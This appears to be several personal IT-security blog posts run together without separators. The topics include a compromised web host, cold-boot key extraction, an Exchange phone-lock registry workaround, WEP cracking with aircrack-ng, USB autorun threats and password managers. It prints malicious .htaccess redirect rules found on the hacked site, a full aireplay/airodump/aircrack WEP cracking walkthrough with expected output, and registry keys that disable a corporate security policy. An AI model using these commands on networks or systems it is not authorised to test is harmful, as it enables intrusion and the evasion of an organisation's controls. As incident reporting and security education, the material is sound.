Recently I discovered some malicious activity on my other web host. I was going through my gallery, http://jiehong.net/gallery when after a few clicks, I got re-directed to ask.com. I thought I haven’t renew my subscription or my domain hosting.

After checking my subscriptions, all is fine. I went into cPanel to poke around. What can cause re-directions, I check the re-directions settings, sub-domains etc. Finally I discover some re-directing codes in some of my .htaccess.

Sample:

ErrorDocument 400 http://ake.kz/in.cgi?8
ErrorDocument 401 http://ake.kz/in.cgi?8
ErrorDocument 403 http://ake.kz/in.cgi?8
ErrorDocument 404 http://ake.kz/in.cgi?8
ErrorDocument 500 http://ake.kz/in.cgi?8

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.* [OR]
RewriteCond %{HTTP_REFERER} .*ask.* [OR]
RewriteCond %{HTTP_REFERER} .*yahoo.* [OR]
RewriteCond %{HTTP_REFERER} .*excite.* [OR]
RewriteCond %{HTTP_REFERER} .*altavista.* [OR]
RewriteCond %{HTTP_REFERER} .*msn.* [OR]
RewriteCond %{HTTP_REFERER} .*netscape.* [OR]
RewriteCond %{HTTP_REFERER} .*aol.* [OR]
RewriteCond %{HTTP_REFERER} .*hotbot.* [OR]
RewriteCond %{HTTP_REFERER} .*goto.* [OR]
RewriteCond %{HTTP_REFERER} .*infoseek.* [OR]
RewriteCond %{HTTP_REFERER} .*mamma.* [OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR]
RewriteCond %{HTTP_REFERER} .*lycos.* [OR]
RewriteCond %{HTTP_REFERER} .*search.* [OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR]
RewriteCond %{HTTP_REFERER} .*bing.* [OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*
RewriteRule ^(.*)$ http://ake.kz/in.cgi?7 [R=301,L]

I discovered a folder was created in my public_html, “coming10/almost”. What’s almost, the hacking is almost done ?
I found the following files inside
– .htaccess
– doing83.html
– er404.php
– everyting40php
– thanks28.html

They all contain encoded javascript to redirect visitors to some site. MY VISITORS ! I reported to my web host, I wonder how much action can they take. They are using ClamAV to scan the /home. Oh well… I’m expecting somebody eye-balling the logs to determine the source of entry.

Now I still do not know how they got in, so I need to monitor my site very closely.

A video can be found here on the process and on why colder memory chip will retain data longer. By retaining the data, you can do a dump of the data and extract the cryptographic keys. They were able to extract keys for BitLocker, TrueCrypt, FileVault and dm-crypt.

The attack is not exploiting weakness of the encryption software but due to the fact that the keys have to be stored in memory.  Encrypting the key in memory don’t really help, you still need to store that key that encrypts somewhere !

When I first power on my HTC Touch Pro, I went through the start up wizard, it prompt me to set a phone lock pin and a timeout for activating the lock. I decided to go with 15mins, since I can change it later.

I decided to configure an Exchange profile on my Touch Pro for my office emails, since I have a Mobile Broadband plan with a 50GB data limit.

After the first day, I got pretty pissed off by the 15mins timeout. I tried changing it but it didn’t allow me to do that. I checked around and realise it’s actually a security policy which is pushed down by my corporate Exchange Server.

Firstly the 15mins timeout is too short, you don’t look at your phone every 10mins to see if you have any new SMS, missed calls or emails. So everytime when I wanted to make a call, reply a SMS, I have to enter my pin to unlock it.

Yes, I believe we should have security controls in place, it’s always a balance of Security and Usability. I am a working in the IT Security line , but it’s too frustrating.

I searched around and I found this workaround. I very surprised the hack published in a Microsoft blog ! Here’s the screen shot of the utility and you can download it here.

Finally, I didn’t disable the phone lock feature, I left it enabled as I did in all my previous phones. I just change the timeout to a more reasonable duration.

As you can see, you can disable the phone lock or modify the timeout duration. It actually modifies the value of several registry keys.

• Enable/Disable the Exchange security policy – HKLM\Security\Policies\00001023: 0 = Enabled; 1 = Disabled
• Inactivity time
  • HKLM\Comm\Security\Policy\LASSD\AE\{50C13377-C66D-400C-889E-C316FC4AB374}\AEFrequencyType: 0 = No inactivity time; 1 = Activity time enable
  • HKLM\Comm\Security\Policy\LASSD\AE\{50C13377-C66D-400C-889E-C316FC4AB374}\AEFrequencyValue: number of minutes before timeout

Remember, the security policy is there for a reason. You won’t want your phone to be picked up by somebody with malicous intent.

Link

Download the source here.

tar -zxvf aircrack-ng-0.9.1.tar.gz
cd aircrack-ng-0.9.1
make
make -B install

make install will throw out some errors, so just do it with a “-B”

-B, –always-make Unconditionally make all targets.

So let’s get started then..Back Track 2 loaded with the rt73 drivers.

The following commands is to get your WUSB54GC dongle into the monitor/injection mode.

“ifconfig rausb0 up”

“iwconfig rausb0 mode monitor channel 1 rate 1M”

“iwpriv rausb0 forceprism 1″

“iwpriv rausb0 rfmontx 1″

I have yet to find out what those iwpriv does other than turning on some private IO controls within the card or drivers.

To verify that your card is ready for injecting, execute “aireplay-ng –test rausb0″

You should see the following:

Trying broadcast probe requests…
Injection is working!
Found 15 APs

Now we are ready, open the first console and execute the following command

“airodump-ng –ivs -w capture –encrypt wep -a rausb0″

and it will return with a list of APs by BSSID, PWR, CH, ESSID and other interesting fields and data dumped to a capture-0x.ivs

Once you have determine your target, you may want to re-run airodump and filter by the BSSID or leave the command running to collect the IVs.

Next, we will execute a series of commands in different consoles together.

The fakeauth attack “aireplay-ng –fakeauth 10 -e MySSID -a 00:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 rausb0″

You should see the following:

Waiting for beacon frame (BSSID: 00:XX:XX:XX:XX:XX)
Sending Authentication Request
Authentication successful
Sending Association Request
Association successful

The ARP replay attack “aireplay-ng –arpreplay -e <ESSID> -b <BSSID> -h 00:11:22:33:44:55 rausb0″

You should see the following:

Saving ARP requests in replay_arp-xxxxx.cap
You should also start airodump-ng to capture replies.
Read 53965 packets (got 31064 ARP requests), sent 48076 packets…(319 pps)

Here’s the part where I don’t get it.

Sometimes you have to run a deauth attack to get some ARP packets coming, sometimes I don’t need to.

aireplay-ng –deauth 10 -e MySSID -a <00:XX:XX:XX:XX:XX> -h 00:11:22:33:44:55 rausb0

Finally after collecting about 100k for 64bit WEP till 500k for 128bit WEP of IV packets, you may execute “aircrack-ng -b 00:XX:XX:XX:XX:XX capture-0x.ivs”

You should see the following:

[00:00:00] Tested 1 keys (got 208713 IVs)

KB depth byte(vote)
0 0/ 1 XX( XX) XX( XX) XX( XX) XX( XX) XX( XX) XX( XX)

0 0/ 2 XX( XX) XX( XX) XX( XX) XX( XX) XX( XX) XX( XX)

.

.

0 0/ 5 XX( XX) XX( XX) XX( XX) XX( XX) XX( XX) XX( XX)

KEY FOUND! [ XX:XX:XX:XX:XX ]
Decrypted correctly: 100%

Forbes reported, A recent news of data related to U.S underground nuclear weapon tests been leaked from Los Alamo Labs.

The threat of USB and other removable media is real and enterprises should be looking into solutions to protect those endpoints

A thumbdrive with 2 partition, 1 which emulate a CD/DVDrom device when plugged into your workstation.

Quoted from Wikipedia, “USB flash drives adhering to the U3 specification are termed “U3 smart drives” by U3.com. “U3 smart drives” differ from traditional USB flash drives because they come preinstalled with the U3 Launchpad, which emulates the Windows OS start menu, and controls program installation.”

Autorun ? Payload ? Malware ? endless ways to go right through your cleverly laid perimeter security.

http://www.hak5.org/wiki/USB_Hacksaw USB shall be seen as EVIL !

How many usernames and passwords are you keeping track of ? Or even the email address that you used to create that account with ? Admit it, most of us have more than 1 email address.
So how do you keep track of them ? Save into a spreadsheet ? Are they secured ? Most spreadsheets built-in protection are not good enough.

Introducing KeePass (Windows), KeePassX (Linux), PasswordSafe (Windows) and MyPasswordSafe (Linux).

They all have the same purpose, keeping your usernames and password under a master password. KeePass database is encrypted with AES, Twofish and your master password hashed with SHA256. My/PasswordSafe didn’t provided detailed enough information regarding security except they use Blowfish for the database encryption.

Now how about securing personal files and those password databases ? Try TrueCrypt. This is available for both Linux(CLI) and Windows.

TrueCrypt will create a file eg, 1024MB in your filesystem. You can mount it as a drive in Windows or a folder in Linux. Any files written into it is protected with encryption algorithms of your own choice.

Well, to conclude, “A chain is only as strong as the weakest link”.

Having a strong encryption protection won’t help unless you use a complex passphrase containing alpha-numerics and symbols, ensure that the length is at least 20 characters.

You can generate a strong passphrase at GRC.

Now, don’t you go writing it down on a Post-It note and pasting it on your monitor.

ISMS in short, Information Security Management System
ISMS, detailed documentation on controls, threats, vulnerabilities.

Any book to recommend or document templates samples for an inspiring Security Auditor ? :p